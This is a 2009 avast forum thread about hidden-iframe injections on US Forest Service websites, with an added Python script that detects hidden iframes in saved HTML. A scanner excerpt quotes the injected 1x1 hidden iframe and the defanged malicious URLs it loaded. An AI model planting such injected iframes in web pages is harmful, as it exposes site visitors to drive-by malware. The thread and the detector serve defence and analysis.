avast!WEBforum
Author Topic: Iframe-inf infects the United States Forest Service???  (Read 689 times)
cowboythecat (Newbie, United States, Posts: 4)
« on: April 14, 2009, 03:31:34 PM »

Hi, I have been getting a warning that the USFS websites (all of them) are infected with Iframe-inf.

A few have gone down and now have the "experiencing technical difficulties" generic message, which leads me to believe that it may be a real threat.

But linkscanner says they are safe.

Help???

Thanks.
Logged
Tech (avast! translator, avast! Technical, Spain, Posts: 47062)
« Reply #1 on: April 14, 2009, 03:48:09 PM »

Generally, avast detection is accurate in these cases.
Isn't it an encrypted/obfuscated script or iframe?
Wasn't the site hacked?
Logged

avast Settings - FAQ - Links
Help me helping you! Sign up & use Mozy to get 2,200 Mb for free remote backup. Enjoy its safety!
cowboythecat (Newbie, United States, Posts: 4)
« Reply #2 on: April 14, 2009, 03:52:52 PM »

Quote from: Tech
Generally, avast detection is accurate in these cases.
Isn't it an encrypted/obfuscated script or iframe?
Wasn't the site hacked?

I'm sorry, but I don't understand what you mean... Please use "internet for dummies" terminology when asking me stuff...

I am not aware of a known hack of the USFS.
Logged
DavidR (avast! Überevangelist, United Kingdom, Posts: 37819)
« Reply #3 on: April 14, 2009, 03:59:10 PM »

Got a link?
Change the http to hXXP in the URL to ensure it isn't active, avoiding accidental exposure.

Given their message it is highly possible it has been infected.

This type of attack, iframe injection, is becoming more common and avast is all over it like a rash. Of all the ones I have investigated in the forums, all have proved correct. However, today I have seen one that might be incorrect.

I have just checked this one out, hXXp://www.fs.fed.us/, and it has most certainly been hacked: a hidden iframe pointing to a Chinese domain.

Note in the image the <h1 Forest Service Website Is Currently Unavailable /h1> (edited); now that could be part of the deception or them trying to clear up. But even the attempt to block, i.e. the unavailability page, is infected.
Logged

Core2Duo E8300/ 2GB Ram/ WinXP ProSP3/ Avast 4.8.1356 Home/ Outpost Firewall Pro 2009/ Firefox 3.5.5 NoScript/ MailWasher Pro 6.5.4/ SuperAntiSpyware Pro/ MalwareBytes AntiMalware/ WinPatrol/ HiJackThis /Drive Image 7.1 /OE6 /SnagIt 9.1 Image Capture
cowboythecat (Newbie, United States, Posts: 4)
« Reply #4 on: April 14, 2009, 04:05:08 PM »

Quote from: DavidR
Got a link?
Change the http to hXXP in the URL to ensure it isn't active, avoiding accidental exposure.

Given their message it is highly possible it has been infected.

This type of attack, iframe injection, is becoming more common and avast is all over it like a rash. Of all the ones I have investigated in the forums, all have proved correct. However, today I have seen one that might be incorrect.

I have just checked this one out, hXXp://www.fs.fed.us/, and it has most certainly been hacked: a hidden iframe pointing to a Chinese domain.

Note in the image the <h1 Forest Service Website Is Currently Unavailable /h1> (edited); now that could be part of the deception or them trying to clear up. But even the attempt to block, i.e. the unavailability page, is infected.

I think the link you searched is as good as any...

I have checked multiple FS sites now and gotten the "website currently unavailable" page without a warning from avast... Does this mean I should be concerned that my computer is infected?

Running the most current version of the free program, and using the most current firefox browser.

Thanks for your replies. Better let my coworkers who run other less-thorough antivirus programs know, I suppose.
Logged
cowboythecat (Newbie, United States, Posts: 4)
« Reply #5 on: April 14, 2009, 04:09:35 PM »

Sorry, here's a link to one of the "down" sites with an unavailable message

hxxp://www.fs.fed.us/r9/shawnee/

From viewing the source, it looks legit.
Logged
DavidR (avast! Überevangelist, United Kingdom, Posts: 37819)
« Reply #6 on: April 14, 2009, 05:18:24 PM »

Those pages where you are getting the message without an avast alert, I can only assume, have been cleaned, but the site I guess won't be available until they resolve not only the removal of the injected iframes but how they got there, and close that vulnerability.

So without URLs for those you can view without alert, there is no way to confirm that they have in fact been cleaned. Though there is more than enough evidence that they have been hacked. If, as you say, this spreads over multiple sites (though I only see links for the one fs.fed.us domain), it could be an orchestrated attack.

Quote from: cowboythecat
Sorry, here's a link to one of the "down" sites with an unavailable message

hxxp://www.fs.fed.us/r9/shawnee/

From viewing the source, it looks legit.

Your viewing of the source is different to mine, as this too has most certainly been hacked (see image), with the same injection of a hidden iframe pointing to a Chinese domain...

So I don't see how you are able to see the page with the unavailable message, though that would also depend on your browser (?)
Logged

polonus (avast! Evangelist, Netherlands, Posts: 8274, "malware fighter")
« Reply #7 on: April 14, 2009, 05:37:19 PM »

Hi DavidR:

Here the results of the Bad Stuff Detektor:
Total zeroiframes found: 1

Check took 6.95 seconds

(Level: 0) Url checked:
hxxp://www.fs.fed.us/
Zeroiframes detected on this site: 1
No ad codes identified

(Level: 1) Url checked: (iframe source)
hxxp://lotmachinesguide.cn/in.cgi?income56
Zeroiframes detected on this site: 0
No ad codes identified
Code:
<iframe src="hxxp://lotmachinesguide.cn/in.cgi?income56" width=1 height=1 style="visibility: hidden"></iframe>


(Level: 2) Url checked: (iframe source)
hxxp://lotmachinesguide.cn/cache/readme.pdf
Blank page / could not connect
No ad codes identified

(Level: 2) Url checked: (iframe source)
hxxp://lotmachinesguide.cn/cache/flash.swf
Blank page / could not connect
No ad codes identified


polonus
Logged

Cybersecurity is more of an attitude than anything else. Avast Evangelists.
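The scanner output above boils down to one check a defender can run locally on saved page source: find every iframe that a visitor would never see (1x1 or smaller, or hidden by CSS) and report where it points. The following is an added example written for this thread, not the Bad Stuff Detektor, avast code, or anything posted by the participants. It uses Python's standard-library HTML parser on a constructed sample page whose injected frame mirrors the shape quoted above (width=1 height=1 style="visibility: hidden"); the hostnames in the sample are made up, and the reported URLs are defanged to hxxp the way the thread does, so the report can be pasted into a ticket without producing a live link.

```python
"""Flag hidden or zero-size iframes in saved HTML (defender-side check).

Added example, not the Bad Stuff Detektor and not avast code. SAMPLE_HTML is
constructed; its injected iframe mirrors the 1x1 hidden frame quoted in the thread.
"""
import re
from html.parser import HTMLParser
from typing import Dict, List, Optional

# Constructed sample page: one ordinary visible iframe, one injected hidden iframe.
SAMPLE_HTML = """<html><head><title>Site Currently Unavailable</title></head>
<body>
<h1>Website Is Currently Unavailable</h1>
<iframe src="http://maps.example.org/embed" width="400" height="300"></iframe>
<iframe src="http://injected.example.invalid/in.cgi?income56" width=1 height=1 style="visibility: hidden"></iframe>
</body></html>"""

# CSS that makes a frame invisible: hidden visibility, display:none, or a zero width/height.
HIDDEN_STYLE_RE = re.compile(
    r"(visibility\s*:\s*hidden|display\s*:\s*none|(width|height)\s*:\s*0(px)?(?![\d.]))",
    re.I,
)


def _dimension(value: Optional[str]) -> Optional[int]:
    """Parse a width/height attribute such as '1' or '1px'; None if absent or not a pixel count."""
    if value is None:
        return None
    m = re.fullmatch(r"\s*(\d+)\s*(px)?\s*", value)
    return int(m.group(1)) if m else None


def is_hidden_iframe(attrs: Dict[str, Optional[str]]) -> bool:
    """True when an <iframe> would not be visible: 1x1 or smaller, or hidden via its style attribute."""
    width = _dimension(attrs.get("width"))
    height = _dimension(attrs.get("height"))
    tiny = (width is not None and width <= 1) or (height is not None and height <= 1)
    style = attrs.get("style") or ""
    return tiny or bool(HIDDEN_STYLE_RE.search(style))


def defang(url: str) -> str:
    """Neutralise a URL for quoting, as the thread does: http:// -> hxxp://, https:// -> hxxps://."""
    return re.sub(r"^http(?=s?://)", "hxxp", url, flags=re.I)


class HiddenIframeFinder(HTMLParser):
    """Collects the src of every <iframe>, split into hidden and visible frames."""

    def __init__(self) -> None:
        super().__init__()
        self.hidden: List[str] = []
        self.visible: List[str] = []

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        attr_map = dict(attrs)  # HTMLParser lowercases attribute names and handles unquoted values
        src = attr_map.get("src") or "(no src)"
        (self.hidden if is_hidden_iframe(attr_map) else self.visible).append(src)


def scan_html(html: str) -> Dict[str, List[str]]:
    """Return defanged iframe sources found in `html`, keyed 'hidden' and 'visible'."""
    finder = HiddenIframeFinder()
    finder.feed(html)
    finder.close()
    return {
        "hidden": [defang(s) for s in finder.hidden],
        "visible": [defang(s) for s in finder.visible],
    }


if __name__ == "__main__":
    result = scan_html(SAMPLE_HTML)
    print(f"Total zeroiframes found: {len(result['hidden'])}")
    for src in result["hidden"]:
        print("  hidden iframe ->", src)
```

Run it against page source saved with a non-rendering fetch (curl, wget) rather than a browser, so the frame's target is never loaded while you inspect it. A clean page should report zero hidden frames; a hit on a site that is also showing an "unavailable" page is exactly the pattern DavidR describes above, where the placeholder page itself still carries the injection.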
scythe944 (avast! Evangelist, United States, Posts: 1230)
« Reply #8 on: April 15, 2009, 02:13:52 AM »

Quote
I am not aware of a known hack of the USFS.

We found one on the US International Trade Commission site...
http://forum.avast.com/index.php?topic=43712

I think they were down for a little over a week after I notified them.

US government sites seem to be getting hit hard these days.
Logged

-Have I helped you? Sign up for Mozy (free pc backup) and help me!
-For generic computer (not avast) problems, you can also visit my forum for help: http://www.jacobytech.net/forum
CharleyO (avast! Evangelist, United States, Posts: 4998, "avast!4 just keeps getting better all the time!")
« Reply #9 on: April 15, 2009, 07:36:47 AM »

***

The website at ... www.fs.fed.us/r9/shawnee/ ... is currently down, apparently to repair the infection.

See the image below.


***
Logged

Thanks to SASHA For My Nice Avatar!
~ It is not important what other people think about you.
    It is important what you truly know about yourself. ~
AMD 64 3200+
Gigabyte GA-K8NS Ultra-939
1 gb RAM
GeForce FX 5800 w/256 ram
XP/SP3 Home
Avast Pro 4.8, Spybot-S&D, SpywareTerminator, ZA Free